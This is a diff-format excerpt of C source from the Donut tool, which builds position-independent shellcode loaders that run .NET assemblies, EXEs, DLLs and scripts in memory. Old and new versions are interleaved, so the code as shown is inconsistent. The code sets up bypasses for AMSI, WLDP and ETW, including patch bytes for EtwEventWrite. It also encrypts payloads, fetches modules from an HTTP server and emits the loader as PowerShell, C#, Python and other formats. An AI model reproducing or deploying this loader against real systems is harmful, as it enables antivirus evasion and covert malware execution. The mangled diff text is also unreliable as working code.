841 c->inst_len = inst->len = inst_len;
842 // set the type of instance we're creating
843 inst->type = c->inst_type;
844 // indicate if we should call RtlExitUserProcess to terminate host process
845 inst->exit_opt = c->exit_opt;
846 // set the Original Entry Point
847 inst->oep = c->oep;
848 // set the entropy level
849 inst->entropy = c->entropy;
850 // set the bypass level
851 inst->bypass = c->bypass;
852 // set the headers level
853 inst->headers = c->headers;
854 // set the module length
855 inst->mod_len = c->mod_len;
856
857 // encryption enabled?
858 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
859 DPRINT("Generating random key for instance");
860 if(!gen_random(&inst_key, sizeof(DONUT_CRYPT))) {
861 DPRINT("gen_random() failed");
862 err = DONUT_ERROR_RANDOM;
863 goto cleanup;
864 }
865 // copy local key to configuration
866 memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT));
867
868 DPRINT("Generating random key for module");
869 if(!gen_random(&mod_key, sizeof(DONUT_CRYPT))) {
870 DPRINT("gen_random() failed");
871 err = DONUT_ERROR_RANDOM;
872 goto cleanup;
873 }
874 // copy local key to configuration
875 memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT));
876
877 DPRINT("Generating random string to verify decryption");
878 if(!gen_random_string(inst->sig, DONUT_SIG_LEN)) {
879 DPRINT("gen_random() failed");
880 err = DONUT_ERROR_RANDOM;
881 goto cleanup;
882 }
883
884 DPRINT("Generating random IV for Maru hash");
885 if(!gen_random(&inst->iv, MARU_IV_LEN)) {
886 DPRINT("gen_random() failed");
887 err = DONUT_ERROR_RANDOM;
888 goto cleanup;
889 }
890 }
891
892 DPRINT("Generating hashes for API using IV: %" PRIX64, inst->iv);
666893
667894 for(cnt=0; api_imports[cnt].module != NULL; cnt++) {
668895 // calculate hash for DLL string
672899 // xor with DLL hash and store in instance
673900 inst->api.hash[cnt] = maru(api_imports[cnt].name, inst->iv) ^ dll_hash;
674901
675 DPRINT("Hash for %-15s : %-22s = %" PRIX64,
902 DPRINT("Hash for %-15s : %-22s = %016" PRIX64,
676903 api_imports[cnt].module,
677904 api_imports[cnt].name,
678905 inst->api.hash[cnt]);
679906 }
680 // save how many API to resolve
907
908 DPRINT("Setting number of API to %" PRIi32, cnt);
681909 inst->api_cnt = cnt;
682 inst->dll_cnt = 0;
683
684 strcpy(inst->dll_name[inst->dll_cnt++], "ole32.dll");
685 strcpy(inst->dll_name[inst->dll_cnt++], "oleaut32.dll");
686 strcpy(inst->dll_name[inst->dll_cnt++], "wininet.dll");
687 strcpy(inst->dll_name[inst->dll_cnt++], "mscoree.dll");
910
911 DPRINT("Setting DLL names to %s", DLL_NAMES);
912 strcpy(inst->dll_names, DLL_NAMES);
688913
689914 // if module is .NET assembly
690915 if(c->mod_type == DONUT_MODULE_NET_DLL ||
705930 {
706931 DPRINT("Copying GUID structures and DLL strings for loading VBS/JS");
707932
708 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
709 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
710 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
711 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
712 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
713 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
714 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
715
716 utf8_to_utf16(inst->wscript, "WScript");
717 utf8_to_utf16(inst->wscript_exe, "wscript.exe");
933 memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID));
934 memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID));
935 memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID));
936 memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID));
937 memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID));
938 memcpy(&inst->xIID_IActiveScriptSiteWindow, &xIID_IActiveScriptSiteWindow, sizeof(GUID));
939 memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID));
940 memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID));
941
942 strcpy(inst->wscript, "WScript");
943 strcpy(inst->wscript_exe, "wscript.exe");
718944
719945 if(c->mod_type == DONUT_MODULE_VBS) {
720946 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_VBScript, sizeof(GUID));
721947 } else {
722948 memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_JScript, sizeof(GUID));
723949 }
724 } else
725 // if module is XSL
726 if(c->mod_type == DONUT_MODULE_XSL)
950 }
951
952 // if bypassing enabled, copy these strings over
953 if(c->bypass != DONUT_BYPASS_NONE) {
954 DPRINT("Copying strings required to bypass AMSI");
955
956 strcpy(inst->clr, "clr");
957 strcpy(inst->amsi, "amsi");
958 strcpy(inst->amsiInit, "AmsiInitialize");
959 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
960 strcpy(inst->amsiScanStr, "AmsiScanString");
961
962 DPRINT("Copying strings required to bypass WLDP");
963
964 strcpy(inst->wldp, "wldp");
965 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
966 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
967
968 DPRINT("Copying strings required to bypass ETW");
969 strcpy(inst->ntdll, "ntdll");
970 strcpy(inst->etwEventWrite, "EtwEventWrite");
971 strcpy(inst->etwEventUnregister, "EtwEventUnregister");
972 strcpy(inst->etwRet64, "\xc3");
973 strcpy(inst->etwRet32, "\xc2\x14\x00\x00");
974 }
975
976 // if module is an unmanaged EXE
977 if(c->mod_type == DONUT_MODULE_EXE) {
978 // does the user specify parameters for the command line?
979 if(c->args[0] != 0) {
980 DPRINT("Copying strings required to replace command line.");
981
982 strcpy(inst->dataname, ".data");
983 strcpy(inst->kernelbase, "kernelbase");
984 strcpy(inst->cmd_syms, "_acmdln;__argv;__p__acmdln;__p___argv;_wcmdln;__wargv;__p__wcmdln;__p___wargv");
985 }
986 // does user want loader to run the entrypoint as a thread?
987 if(c->thread != 0) {
988 DPRINT("Copying strings required to intercept exit-related API");
989 // these exit-related API will be replaced with pointer to RtlExitUserThread
990 strcpy(inst->exit_api, "ExitProcess;exit;_exit;_cexit;_c_exit;quick_exit;_Exit");
991 }
992 }
993
994 // decoy module path
995 if (c->decoy[0] != 0)
727996 {
728 DPRINT("Copying GUID structures for loading XSL to instance");
729
730 memcpy(&inst->xCLSID_DOMDocument30, &xCLSID_DOMDocument30, sizeof(GUID));
731 memcpy(&inst->xIID_IXMLDOMDocument, &xIID_IXMLDOMDocument, sizeof(GUID));
732 memcpy(&inst->xIID_IXMLDOMNode, &xIID_IXMLDOMNode, sizeof(GUID));
733 }
734
735 // required to disable AMSI
736 strcpy(inst->amsi.s, "AMSI");
737 strcpy(inst->amsiInit, "AmsiInitialize");
738 strcpy(inst->amsiScanBuf, "AmsiScanBuffer");
739 strcpy(inst->amsiScanStr, "AmsiScanString");
740
741 strcpy(inst->clr, "CLR");
742
743 // required to disable WLDP
744 strcpy(inst->wldp, "WLDP");
745 strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust");
746 strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList");
747
748 // set the type of instance we're creating
749 inst->type = c->inst_type;
750
997 wcscpy((wchar_t*)inst->decoy, L"\\??\\");
998 wchar_t wcFileName[MAX_PATH];
999 mbstowcs(wcFileName, c->decoy, MAX_PATH);
1000 wcsncat((wchar_t*)inst->decoy, wcFileName, MAX_PATH);
1001 }
1002
7511003 // if the module will be downloaded
7521004 // set the URL parameter and request verb
753 if(inst->type == DONUT_INSTANCE_URL) {
754 // generate a random name for module
755 // that will be saved to disk
756 if(!GenRandomString(c->modname, DONUT_MAX_MODNAME)) {
757 return DONUT_ERROR_RANDOM;
758 }
759 DPRINT("Generated random name for module : %s", c->modname);
760
761 DPRINT("Setting URL parameters");
762 strcpy(inst->http.url, c->url);
1005 if(inst->type == DONUT_INSTANCE_HTTP) {
1006 // if no module name specified
1007 if(c->modname[0] == 0) {
1008 // if entropy disabled
1009 if(c->entropy == DONUT_ENTROPY_NONE) {
1010 // set to "AAAAAAAA"
1011 memset(c->modname, 'A', DONUT_MAX_MODNAME);
1012 } else {
1013 // generate a random name for module
1014 // that will be saved to disk
1015 DPRINT("Generating random name for module");
1016 if(!gen_random_string(c->modname, DONUT_MAX_MODNAME)) {
1017 DPRINT("gen_random_string() failed");
1018 err = DONUT_ERROR_RANDOM;
1019 goto cleanup;
1020 }
1021 }
1022 DPRINT("Name for module : %s", c->modname);
1023 }
1024 strcpy(inst->server, c->server);
7631025 // append module name
764 strcat(inst->http.url, c->modname);
1026 strcat(inst->server, c->modname);
7651027 // set the request verb
766 strcpy(inst->http.req, "GET");
767
768 DPRINT("Payload will attempt download from : %s", inst->http.url);
769 }
770
771 inst->mod_len = c->mod_len;
772 inst->len = inst_len;
773 c->inst = inst;
774 c->inst_len = inst_len;
775
776 #if !defined(NOCRYPTO)
777 if(c->inst_type == DONUT_INSTANCE_URL) {
778 DPRINT("encrypting module for download");
779
780 c->mod->mac = maru(inst->sig, inst->iv);
781
782 donut_encrypt(
783 mod_key.mk,
784 mod_key.ctr,
785 c->mod,
786 c->mod_len);
787 }
788 #endif
789 // if PIC, copy module to instance
790 if(inst->type == DONUT_INSTANCE_PIC) {
1028 strcpy(inst->http_req, "GET");
1029
1030 DPRINT("Loader will attempt to download module from : %s", inst->server);
1031
1032 // encrypt module?
1033 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
1034 DPRINT("Encrypting module");
1035
1036 c->mod->mac = maru(inst->sig, inst->iv);
1037
1038 donut_encrypt(
1039 mod_key.mk,
1040 mod_key.ctr,
1041 c->mod,
1042 c->mod_len);
1043 }
1044 } else
1045 // if embedded, copy module to instance
1046 if(inst->type == DONUT_INSTANCE_EMBED) {
7911047 DPRINT("Copying module data to instance");
7921048 memcpy(&c->inst->module.x, c->mod, c->mod_len);
7931049 }
7941050
795 #if !defined(NOCRYPTO)
796 DPRINT("encrypting instance");
797
798 inst->mac = maru(inst->sig, inst->iv);
799
800 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
801
802 donut_encrypt(
803 inst_key.mk,
804 inst_key.ctr,
805 inst_data,
806 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
807 #endif
808 DPRINT("Leaving.");
809
810 return DONUT_ERROR_SUCCESS;
811 }
812
813 // given a configuration, create a PIC that will run from anywhere in memory
814 EXPORT_FUNC
815 int DonutCreate(PDONUT_CONFIG c) {
816 uint8_t *pl;
817 uint32_t t;
818 int url_len, err = DONUT_ERROR_SUCCESS;
819 FILE *fd;
820 file_info fi;
1051 // encrypt instance?
1052 if(c->entropy == DONUT_ENTROPY_DEFAULT) {
1053 DPRINT("Encrypting instance");
1054
1055 inst->mac = maru(inst->sig, inst->iv);
1056
1057 uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt);
1058
1059 donut_encrypt(
1060 inst_key.mk,
1061 inst_key.ctr,
1062 inst_data,
1063 c->inst_len - offsetof(DONUT_INSTANCE, api_cnt));
1064 }
1065 cleanup:
1066 // error? release memory for everything
1067 if(err != DONUT_ERROR_OK) {
1068 DPRINT("Releasing memory for module due to errors.");
1069 free(c->mod);
1070 }
1071 DPRINT("Leaving with error : %" PRId32, err);
1072 return err;
1073 }
1074
1075 /**
1076 * Function: save_file
1077 * ----------------------------
1078 * Creates a file and writes the contents of input buffer to it.
1079 *
1080 * INPUT : path = where to create file.
1081 * data = what to write to file.
1082 * len = length of data.
1083 *
1084 * OUTPUT : Donut error code.
1085 */
1086 static int save_file(const char *path, void *data, int len) {
1087 FILE *out;
1088 int err = DONUT_ERROR_OK;
8211089
8221090 DPRINT("Entering.");
823
824 DPRINT("Validating configuration and path of file PDONUT_CONFIG: %p", c);
825
826 if(c == NULL || c->file[0] == 0) {
827 return DONUT_ERROR_INVALID_PARAMETER;
828 }
829
830 c->mod = NULL;
831 c->mod_len = 0;
832
833 c->inst = NULL;
834 c->inst_len = 0;
835
836 c->pic = NULL;
837 c->pic_len = 0;
838
839 // instance not specified?
840 DPRINT("Validating instance type %" PRIx32 "", c->inst_type);
841
842 if(c->inst_type != DONUT_INSTANCE_PIC &&
843 c->inst_type != DONUT_INSTANCE_URL) {
844
845 return DONUT_ERROR_INVALID_PARAMETER;
846 }
847
848 if(c->inst_type == DONUT_INSTANCE_URL) {
849 DPRINT("Validating URL");
850
851 // no URL? exit
852 if(c->url[0] == 0) {
853 return DONUT_ERROR_INVALID_PARAMETER;
854 }
855 // doesn't begin with one of the following? exit
856 if((strnicmp(c->url, "http://", 7) != 0) &&
857 (strnicmp(c->url, "https://", 8) != 0)) {
858
859 return DONUT_ERROR_INVALID_URL;
860 }
861 // invalid length?
862 if(strlen(c->url) <= 8) {
863 return DONUT_ERROR_URL_LENGTH;
864 }
865 // ensure URL parameter and module name don't exceed DONUT_MAX_URL
866 url_len = strlen(c->url);
867
868 // if the end of string doesn't have a forward slash
869 // add one more to account for it
870 if(c->url[url_len - 1] != '/') {
871 strcat(c->url, "/");
872 url_len++;
873 }
874
875 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_URL) {
876 return DONUT_ERROR_URL_LENGTH;
877 }
878 }
879
880 DPRINT("Validating architecture");
881
882 if(c->arch != DONUT_ARCH_X86 &&
883 c->arch != DONUT_ARCH_X64 &&
884 c->arch != DONUT_ARCH_X84 &&
885 c->arch != DONUT_ARCH_ANY)
886 {
887 return DONUT_ERROR_INVALID_ARCH;
888 }
889
890 DPRINT("Validating AMSI/WDLP bypass option");
891
892 if(c->bypass != DONUT_BYPASS_SKIP &&
893 c->bypass != DONUT_BYPASS_ABORT &&
894 c->bypass != DONUT_BYPASS_CONTINUE)
895 {
896 return DONUT_ERROR_BYPASS_INVALID;
897 }
898
899 // get file information
900 err = get_file_info(c->file, &fi);
901 if(err != DONUT_ERROR_SUCCESS) return err;
902
903 // Set the module type
904 c->mod_type = fi.type;
905
906 // Unmanaged EXE/DLL?
907 if(c->mod_type == DONUT_MODULE_DLL ||
908 c->mod_type == DONUT_MODULE_EXE)
909 {
910 DPRINT("Validating architecture %i for DLL/EXE %i",
911 c->arch, fi.arch);
912 // Requested shellcode is x86, but file is x64?
913 // Requested shellcode is x64, but file is x86?
914 if((c->arch == DONUT_ARCH_X86 &&
915 fi.arch == DONUT_ARCH_X64) ||
916 (c->arch == DONUT_ARCH_X64 &&
917 fi.arch == DONUT_ARCH_X86))
918 {
919 err = DONUT_ERROR_ARCH_MISMATCH;
920 goto cleanup;
921 }
922 // DLL function specified. Does it exist?
923 if(c->mod_type == DONUT_MODULE_DLL &&
924 c->method[0] != 0)
925 {
926 DPRINT("Validating DLL function \"%s\" for DLL", c->method);
927 if(!is_dll_export(&fi, c->method)) {
928 err = DONUT_ERROR_DLL_FUNCTION;
929 goto cleanup;
930 }
931 }
932 }
933 // .NET DLL assembly?
934 if(c->mod_type == DONUT_MODULE_NET_DLL) {
935 // DLL requires class and method
936 if(c->cls[0] == 0 || c->method[0] == 0) {
937 err = DONUT_ERROR_NET_PARAMS;
938 goto cleanup;
939 }
940 }
941
942 // is this an unmanaged DLL with parameters?
943 if(c->mod_type == DONUT_MODULE_DLL &&
944 c->param[0] != 0)
945 {
946 // we need a DLL function
947 if(c->method[0] == 0) {
948 err = DONUT_ERROR_DLL_PARAM;
949 goto cleanup;
950 }
951 }
952 // 1. Create the module
953 DPRINT("Creating module");
954 err = CreateModule(c, &fi);
955
956 if(err != DONUT_ERROR_SUCCESS)
957 goto cleanup;
958
959 // 2. Create the instance
960 DPRINT("Creating instance");
961 err = CreateInstance(c, &fi);
962
963 if(err != DONUT_ERROR_SUCCESS)
964 goto cleanup;
1091 out = fopen(path, "wb");
1092
1093 if(out != NULL) {
1094 DPRINT("Writing %d bytes of %p to %s", len, data, path);
1095 fwrite(data, 1, len, out);
1096 fclose(out);
1097 } else err = DONUT_ERROR_FILE_ACCESS;
1098
1099 DPRINT("Leaving with error : %" PRId32, err);
1100 return err;
1101 }
1102
1103 /**
1104 * Function: save_loader
1105 * ----------------------------
1106 * Saves the loader to output file. Also saves instance for debug builds.
1107 * If the instance type is HTTP, it saves the module to file.
1108 *
1109 * INPUT : Donut configuration.
1110 *
1111 * OUTPUT : Donut error code.
1112 */
1113 static int save_loader(PDONUT_CONFIG c) {
1114 int err = DONUT_ERROR_OK;
1115 FILE *fd;
9651116
9661117 // if DEBUG is defined, save instance to disk
9671118 #ifdef DEBUG
968 DPRINT("Saving instance to file");
969 fd = fopen("instance", "wb");
970
971 if(fd != NULL) {
972 fwrite(c->inst, 1, c->inst_len, fd);
973 fclose(fd);
974 }
1119 DPRINT("Saving instance %p to file. %" PRId32 " bytes.", c->inst, c->inst_len);
1120 save_file("instance", c->inst, c->inst_len);
9751121 #endif
976 // 3. If the module will be stored on a remote server
977 if(c->inst_type == DONUT_INSTANCE_URL) {
978 DPRINT("Saving %s to disk.", c->modname);
979 // save the module to disk using random name
980 fd = fopen(c->modname, "wb");
981
982 if(fd != NULL) {
983 fwrite(c->mod, 1, c->mod_len, fd);
984 fclose(fd);
985 }
986 }
987 // 4. calculate size of PIC + instance combined
1122
1123 // If the module will be stored on a remote server
1124 if(c->inst_type == DONUT_INSTANCE_HTTP) {
1125 DPRINT("Saving %s to file.", c->modname);
1126 save_file(c->modname, c->mod, c->mod_len);
1127 }
1128
1129 // no output file specified?
1130 if(c->output[0] == 0) {
1131 // set to default name based on format
1132 switch(c->format) {
1133 case DONUT_FORMAT_BINARY:
1134 strncpy(c->output, "loader.bin", DONUT_MAX_NAME-1);
1135 break;
1136 case DONUT_FORMAT_BASE64:
1137 strncpy(c->output, "loader.b64", DONUT_MAX_NAME-1);
1138 break;
1139 case DONUT_FORMAT_RUBY:
1140 strncpy(c->output, "loader.rb", DONUT_MAX_NAME-1);
1141 break;
1142 case DONUT_FORMAT_C:
1143 strncpy(c->output, "loader.c", DONUT_MAX_NAME-1);
1144 break;
1145 case DONUT_FORMAT_PYTHON:
1146 strncpy(c->output, "loader.py", DONUT_MAX_NAME-1);
1147 break;
1148 case DONUT_FORMAT_POWERSHELL:
1149 strncpy(c->output, "loader.ps1", DONUT_MAX_NAME-1);
1150 break;
1151 case DONUT_FORMAT_CSHARP:
1152 strncpy(c->output, "loader.cs", DONUT_MAX_NAME-1);
1153 break;
1154 case DONUT_FORMAT_HEX:
1155 strncpy(c->output, "loader.hex", DONUT_MAX_NAME-1);
1156 break;
1157 }
1158 }
1159 // save loader to file
1160 fd = fopen(c->output, "wb");
1161 if(fd == NULL) {
1162 DPRINT("Opening %s failed.", c->output);
1163 return DONUT_ERROR_FILE_ACCESS;
1164 }
1165
1166 switch(c->format) {
1167 case DONUT_FORMAT_BINARY: {
1168 DPRINT("Saving loader as binary");
1169 fwrite(c->pic, 1, c->pic_len, fd);
1170 err = DONUT_ERROR_OK;
1171 break;
1172 }
1173 case DONUT_FORMAT_BASE64: {
1174 DPRINT("Saving loader as base64 string");
1175 err = base64_template(c->pic, c->pic_len, fd);
1176 break;
1177 }
1178 case DONUT_FORMAT_RUBY:
1179 case DONUT_FORMAT_C:
1180 DPRINT("Saving loader as C/Ruby string");
1181 err = c_ruby_template(c->pic, c->pic_len, fd);
1182 break;
1183 case DONUT_FORMAT_PYTHON:
1184 DPRINT("Saving loader as Python string");
1185 err = py_template(c->pic, c->pic_len, fd);
1186 break;
1187 case DONUT_FORMAT_POWERSHELL:
1188 DPRINT("Saving loader as Powershell string");
1189 err = powershell_template(c->pic, c->pic_len, fd);
1190 break;
1191 case DONUT_FORMAT_CSHARP:
1192 DPRINT("Saving loader as C# string");
1193 err = csharp_template(c->pic, c->pic_len, fd);
1194 break;
1195 case DONUT_FORMAT_HEX:
1196 DPRINT("Saving loader as Hex string");
1197 err = hex_template(c->pic, c->pic_len, fd);
1198 break;
1199 }
1200 fclose(fd);
1201 DPRINT("Leaving with error : %" PRId32, err);
1202 return err;
1203 }
1204
1205 /**
1206 * Function: build_loader
1207 * ----------------------------
1208 * Builds the shellcode that's injected into remote process.
1209 *
1210 * INPUT : Donut configuration.
1211 *
1212 * OUTPUT : Donut error code.
1213 */
1214 static int build_loader(PDONUT_CONFIG c) {
1215 uint8_t *pl;
1216 uint32_t t;
1217
1218 // target is x86?
9881219 if(c->arch == DONUT_ARCH_X86) {
989 c->pic_len = sizeof(PAYLOAD_EXE_X86) + c->inst_len + 32;
1220 c->pic_len = sizeof(LOADER_EXE_X86) + c->inst_len + 32;
9901221 } else
1222 // target is amd64?
9911223 if(c->arch == DONUT_ARCH_X64) {
992 c->pic_len = sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
1224 c->pic_len = sizeof(LOADER_EXE_X64) + c->inst_len + 32;
9931225 } else
1226 // target can be both x86 and amd64?
9941227 if(c->arch == DONUT_ARCH_X84) {
995 c->pic_len = sizeof(PAYLOAD_EXE_X86) +
996 sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32;
997 }
998 // 5. allocate memory for shellcode
1228 c->pic_len = sizeof(LOADER_EXE_X86) +
1229 sizeof(LOADER_EXE_X64) + c->inst_len + 32;
1230 }
1231 // allocate memory for shellcode
9991232 c->pic = malloc(c->pic_len);
1000
1001 DPRINT("PIC size : %" PRIi64, c->pic_len);
1002
1233
10031234 if(c->pic == NULL) {
1004 err = DONUT_ERROR_NO_MEMORY;
1005 goto cleanup;
1235 DPRINT("Unable to allocate %" PRId32 " bytes of memory for loader.", c->pic_len);
1236 return DONUT_ERROR_NO_MEMORY;
10061237 }
10071238
10081239 DPRINT("Inserting opcodes");
1009 // 6. insert shellcode
1240
1241 // insert shellcode
10101242 pl = (uint8_t*)c->pic;
1243
10111244 // call $ + c->inst_len
10121245 PUT_BYTE(pl, 0xE8);
10131246 PUT_WORD(pl, c->inst_len);
10241257 // push edx
10251258 PUT_BYTE(pl, 0x52);
10261259
1027 DPRINT("Copying %" PRIi64 " bytes of x86 shellcode",
1028 (uint64_t)sizeof(PAYLOAD_EXE_X86));
1260 DPRINT("Copying %" PRIi32 " bytes of x86 shellcode",
1261 (uint32_t)sizeof(LOADER_EXE_X86));
10291262
1030 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1263 PUT_BYTES(pl, LOADER_EXE_X86, sizeof(LOADER_EXE_X86));
10311264 } else
10321265 // AMD64?
10331266 if(c->arch == DONUT_ARCH_X64) {
10341267
1035 DPRINT("Copying %" PRIi64 " bytes of amd64 shellcode",
1036 (uint64_t)sizeof(PAYLOAD_EXE_X64));
1037
1038 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1268 DPRINT("Copying %" PRIi32 " bytes of amd64 shellcode",
1269 (uint32_t)sizeof(LOADER_EXE_X64));
1270
1271 // ensure stack is 16-byte aligned for x64 for Microsoft x64 calling convention
1272
1273 // and rsp, -0x10
1274 PUT_BYTE(pl, 0x48);
1275 PUT_BYTE(pl, 0x83);
1276 PUT_BYTE(pl, 0xE4);
1277 PUT_BYTE(pl, 0xF0);
1278 // push rcx
1279 // this is just for alignment, any 8 bytes would do
1280 PUT_BYTE(pl, 0x51);
1281
1282 PUT_BYTES(pl, LOADER_EXE_X64, sizeof(LOADER_EXE_X64));
10391283 } else
10401284 // x86 + AMD64?
10411285 if(c->arch == DONUT_ARCH_X84) {
10421286
1043 DPRINT("Copying %" PRIi64 " bytes of x86 + amd64 shellcode",
1044 (uint64_t)(sizeof(PAYLOAD_EXE_X86) + sizeof(PAYLOAD_EXE_X64)));
1287 DPRINT("Copying %" PRIi32 " bytes of x86 + amd64 shellcode",
1288 (uint32_t)(sizeof(LOADER_EXE_X86) + sizeof(LOADER_EXE_X64)));
10451289
10461290 // xor eax, eax
10471291 PUT_BYTE(pl, 0x31);
10511295 // js dword x86_code
10521296 PUT_BYTE(pl, 0x0F);
10531297 PUT_BYTE(pl, 0x88);
1054 PUT_WORD(pl, sizeof(PAYLOAD_EXE_X64));
1055 PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64));
1298 PUT_WORD(pl, sizeof(LOADER_EXE_X64) + 5);
1299
1300 // ensure stack is 16-byte aligned for x64 for Microsoft x64 calling convention
1301
1302 // and rsp, -0x10
1303 PUT_BYTE(pl, 0x48);
1304 PUT_BYTE(pl, 0x83);
1305 PUT_BYTE(pl, 0xE4);
1306 PUT_BYTE(pl, 0xF0);
1307 // push rcx
1308 // this is just for alignment, any 8 bytes would do
1309 PUT_BYTE(pl, 0x51);
1310
1311 PUT_BYTES(pl, LOADER_EXE_X64, sizeof(LOADER_EXE_X64));
10561312 // pop edx
10571313 PUT_BYTE(pl, 0x5A);
10581314 // push ecx
10591315 PUT_BYTE(pl, 0x51);
10601316 // push edx
10611317 PUT_BYTE(pl, 0x52);
1062 PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86));
1063 }
1064 cleanup:
1318 PUT_BYTES(pl, LOADER_EXE_X86, sizeof(LOADER_EXE_X86));
1319 }
1320 return DONUT_ERROR_OK;
1321 }
1322
1323 /**
1324 * Function: validate_loader_cfg
1325 * ----------------------------
1326 * Validates Donut configuration for loader.
1327 *
1328 * INPUT : Pointer to a Donut configuration.
1329 *
1330 * OUTPUT : Donut error code.
1331 */
1332 static int validate_loader_cfg(PDONUT_CONFIG c) {
1333 uint32_t url_len;
1334
1335 DPRINT("Validating loader configuration.");
1336
1337 if(c == NULL || c->input[0] == 0) {
1338 DPRINT("No configuration or input file provided.");
1339 return DONUT_ERROR_INVALID_PARAMETER;
1340 }
1341
1342 if(c->inst_type != DONUT_INSTANCE_EMBED &&
1343 c->inst_type != DONUT_INSTANCE_HTTP) {
1344
1345 DPRINT("Instance type %" PRIx32 " is invalid.", c->inst_type);
1346 return DONUT_ERROR_INVALID_PARAMETER;
1347 }
1348
1349 if(c->format < DONUT_FORMAT_BINARY || c->format > DONUT_FORMAT_HEX) {
1350 DPRINT("Format type %" PRId32 " is invalid.", c->format);
1351 return DONUT_ERROR_INVALID_FORMAT;
1352 }
1353
1354 #ifdef WINDOWS
1355 if(c->compress != DONUT_COMPRESS_NONE &&
1356 c->compress != DONUT_COMPRESS_APLIB &&
1357 c->compress != DONUT_COMPRESS_LZNT1 &&
1358 c->compress != DONUT_COMPRESS_XPRESS)
1359 {
1360 DPRINT("Compression engine %" PRId32 " is invalid.", c->compress);
1361 return DONUT_ERROR_INVALID_ENGINE;
1362 }
1363 #else
1364 if(c->compress != DONUT_COMPRESS_NONE &&
1365 c->compress != DONUT_COMPRESS_APLIB)
1366 {
1367 DPRINT("Compression engine %" PRId32 " is invalid.", c->compress);
1368 return DONUT_ERROR_INVALID_ENGINE;
1369 }
1370 #endif
1371
1372 if(c->entropy != DONUT_ENTROPY_NONE &&
1373 c->entropy != DONUT_ENTROPY_RANDOM &&
1374 c->entropy != DONUT_ENTROPY_DEFAULT)
1375 {
1376 DPRINT("Entropy level %" PRId32 " is invalid.", c->entropy);
1377 return DONUT_ERROR_INVALID_ENTROPY;
1378 }
1379
1380 if(c->inst_type == DONUT_INSTANCE_HTTP) {
1381 // no URL? exit
1382 if(c->server[0] == 0) {
1383 DPRINT("Error: No HTTP server provided.");
1384 return DONUT_ERROR_INVALID_PARAMETER;
1385 }
1386 // doesn't begin with one of the following? exit
1387 if((strnicmp(c->server, "http://", 7) != 0) &&
1388 (strnicmp(c->server, "https://", 8) != 0)) {
1389
1390 DPRINT("URL is invalid : %s", c->server);
1391 return DONUT_ERROR_INVALID_URL;
1392 }
1393 // invalid length?
1394 url_len = (uint32_t)strlen(c->server);
1395
1396 if(url_len <= 8) {
1397 DPRINT("URL length : %" PRId32 " is invalid.", url_len);
1398 return DONUT_ERROR_URL_LENGTH;
1399 }
1400 // if the end of string doesn't have a forward slash
1401 // add one more to account for it
1402 if(c->server[url_len - 1] != '/') {
1403 c->server[url_len] = '/';
1404 url_len++;
1405 }
1406
1407 if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_NAME) {
1408 DPRINT("URL length : %" PRId32 " exceeds size of buffer : %"PRId32,
1409 url_len+DONUT_MAX_MODNAME, DONUT_MAX_NAME);
1410 return DONUT_ERROR_URL_LENGTH;
1411 }
1412 }
1413
1414 if(c->arch != DONUT_ARCH_X86 &&
1415 c->arch != DONUT_ARCH_X64 &&
1416 c->arch != DONUT_ARCH_X84 &&
1417 c->arch != DONUT_ARCH_ANY)
1418 {
1419 DPRINT("Target architecture %"PRId32 " is invalid.", c->arch);
1420 return DONUT_ERROR_INVALID_ARCH;
1421 }
1422
1423 if(c->bypass != DONUT_BYPASS_NONE &&
1424 c->bypass != DONUT_BYPASS_ABORT &&
1425 c->bypass != DONUT_BYPASS_CONTINUE)
1426 {
1427 DPRINT("Option to bypass AMSI/WDLP %"PRId32" is invalid.", c->bypass);
1428 return DONUT_ERROR_BYPASS_INVALID;
1429 }
1430
1431 if(c->headers != DONUT_HEADERS_OVERWRITE &&
1432 c->headers != DONUT_HEADERS_KEEP)
1433 {
1434 DPRINT("Option to preserve PE headers (or not) %"PRId32" is invalid.", c->headers);
1435 return DONUT_ERROR_HEADERS_INVALID;
1436 }
1437
1438 DPRINT("Loader configuration passed validation.");
1439 return DONUT_ERROR_OK;
1440 }
1441
1442 /**
1443 * Function: is_dll_export
1444 * ----------------------------
1445 * Validates if a DLL exports a function.
